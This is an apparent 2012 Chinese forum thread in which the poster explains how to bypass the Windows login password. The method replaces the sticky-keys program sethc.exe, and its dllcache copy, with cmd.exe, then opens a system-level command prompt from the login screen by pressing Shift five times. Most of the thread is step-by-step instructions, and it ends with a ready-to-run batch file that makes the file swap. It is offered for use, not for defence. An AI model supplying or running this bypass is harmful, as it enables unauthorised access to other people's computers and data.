神乎其技吧 关注:368贴子:30,110
  • 9回复贴,共1

按了5下shift,绕过了开机密码

取消只看楼主收藏回复



IP属地:四川1楼2012-03-15 09:18回复
    一般状态,电脑键盘连续按五次shift键,会启动一个名为 粘滞键 的程序
    由于这个程序具有系统权限
    所以几乎可以再任何时候被启用


    IP属地:四川3楼2012-03-15 09:22
    回复
      豁你又没有钱赚


      IP属地:四川4楼2012-03-15 09:22
      回复
        接2楼。所谓任何时候,当然也包括了开机需要输入登陆密码的时候
        在密码登陆的时候启用粘滞键有用?
        当然没有用
        但是粘滞键程序如果被替换成了别的东西呢


        IP属地:四川5楼2012-03-15 09:24
        回复
          本帖就讲把系统的粘滞键程序替换为cmd程序
          粘滞键程序的位置是 C:\windows\system32\sethc.exe
          cmd命令提示符位置 C:\windows\system32\cmd.exe
          只要将sethc.exe改名或者删除,然后把cmd.exe改为sethc.exe
          就ok了


          IP属地:四川6楼2012-03-15 09:28
          收起回复
            但是我在尝试更改的时候,发现由于系统文件保护功能,改动过后总会被系统莫名其妙改回来
            百度过资料
            发现是system32下dllcache下的sethc.exe问题,这个windows\system32\dllcache\sethc.exe同样需要用cmd.exe去覆盖


            IP属地:四川7楼2012-03-15 09:30
            回复
              更改完成后
              重新启动电脑,遇到密码登陆窗口
              此时直接狂按你的shift键
              就会打开cmd窗口,儿cmd窗口中一个简单的资源管理器命令explorer.exe 就可以打开【我的电脑】,也就是绕过了密码登陆了计算机


              IP属地:四川8楼2012-03-15 09:32
              回复

                由于操作并不复杂,考虑到对系统文件查找有困难的人
                我去上完两节英语课后回来写批处理文件,瞬间完成更改


                IP属地:四川9楼2012-03-15 09:33
                回复
                  先撤了


                  IP属地:四川10楼2012-03-15 09:34
                  回复
                    批处理代码:
                    _____________________________________
                    @echo off
                    move /y "C:\WINDOWS\system32\sethc.exe" "C:\WINDOWS\system32\sethc.xxx"
                    copy /y "C:\WINDOWS\system32\cmd.exe" "C:\WINDOWS\system32\sethc.exe"
                    copy /y "C:\WINDOWS\system32\cmd.exe" "C:\WINDOWS\system32\dllcache\sethc.exe"
                    echo 完成更改,任意键退出 & pause>nul
                    _______________________________________
                    将代码保存进txt文档,改txt拓展名为bat,运行即可
                    


                    IP属地:四川11楼2012-03-15 12:13
                    收起回复